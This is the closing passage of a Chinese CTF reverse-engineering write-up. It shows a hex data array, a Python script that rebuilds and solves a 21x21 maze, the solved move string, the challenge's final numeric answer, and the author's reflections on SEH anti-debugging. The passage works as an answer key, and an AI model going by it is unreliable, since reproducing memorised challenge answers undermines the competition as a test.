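0x00001062, 0x00001196, 0x00001233, 0x000013FE, 0x00001486, 0x000000E7, 0x000001AF, 0x00000205, 0x00000371, 0x00000482, 0x000005F0, 0x00000670, 0x0000072E, 0x00000849, 0x00000925, 0x00000A5B, 0x00000B0E, 0x00000C7F, 0x00000D75, 0x00000EF4, 0x00000F61, 0x0000101D, 0x0000116B, 0x0000127E, 0x00001382, 0x00001404, 0x0000004D, 0x0000015C, 0x0000027F, 0x0000033F, 0x00000442, 0x000005B6, 0x0000064D, 0x00000780, 0x0000086B, 0x000009DC, 0x00000AF1, 0x00000B79, 0x00000C66, 0x00000D6E, 0x00000E9D, 0x00000F23, 0x0000107B, 0x00001126, 0x000012D5, 0x0000133F, 0x000014AE, 0x0000007D, 0x000001AD, 0x000002BB, 0x000003A1, 0x00000473, 0x0000054E, 0x000006C0, 0x000007D0, 0x0000083F, 0x000009DA, 0x00000AE6, 0x00000BA9, 0x00000CA0, 0x00000DC3, 0x00000E30, 0x00000F8E, 0x00001066, 0x000011CD, 0x0000124B, 0x00001361, 0x000014B8, 0x000000EE, 0x0000016D, 0x00000275, 0x0000033C, 0x00000473, 0x000005A8, 0x00000679, 0x00000759, 0x0000080B, 0x000009B4, 0x00000AC7, 0x00000B03, 0x00000C07, 0x00000DAE, 0x00000E82, 0x00000FF8, 0x00001050, 0x000011DF, 0x00001261, 0x000013A0, 0x000014D5, 0x00000053, 0x000001B7, 0x000002D8, 0x000003B8, 0x00000478, 0x000005BC, 0x000006CC, 0x000007DE, 0x000008C6, 0x00000990, 0x00000A3F, 0x00000B21, 0x00000CBF, 0x00000DBB, 0x00000EDC, 0x00000FB1, 0x0000103B, 0x0000116B, 0x0000126B, 0x000013E0, 0x00001434]


if __name__ == '__main__':
    maze = build_maze(dword_4043C8, byte_404208)
    # One print per row (the original nested two loops over the same name
    # and printed every row 21 times while building a 441-row maze).
    for row in maze:
        print(row)

    start=(0,0)
    end=(20,20)

    find_path(maze,start,end)
    see_path(maze,path)
#jjjllllllllllllllljjjjjjjjkjjkkkkhhhhhhhkkkkkkkkkkjjjjllljjjlllhhhhlljjjjjjkkkkkkkkjjlllllllllllhhlllllhhhlhhhhhhhhlljjjjjjjjjjjjjjjjl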

最终结果:

1661451301787
1661451301787

总结

这道题确实超出我能力范围,还需要接着努力。长城杯这道题做出来的人,高校组差不多有十个左右?政企组就只有两个,如果这个题做出来了,应该可以去线下了吧。不过这一年的努力没有白费,希望网鼎杯能出好成绩。关于try except中,SEH反调试优先交给调试器这个我有个印象,之前听大佬们讲直播讲课有提及。hed10ne大佬留了一篇反调试佳作:反调试技术整理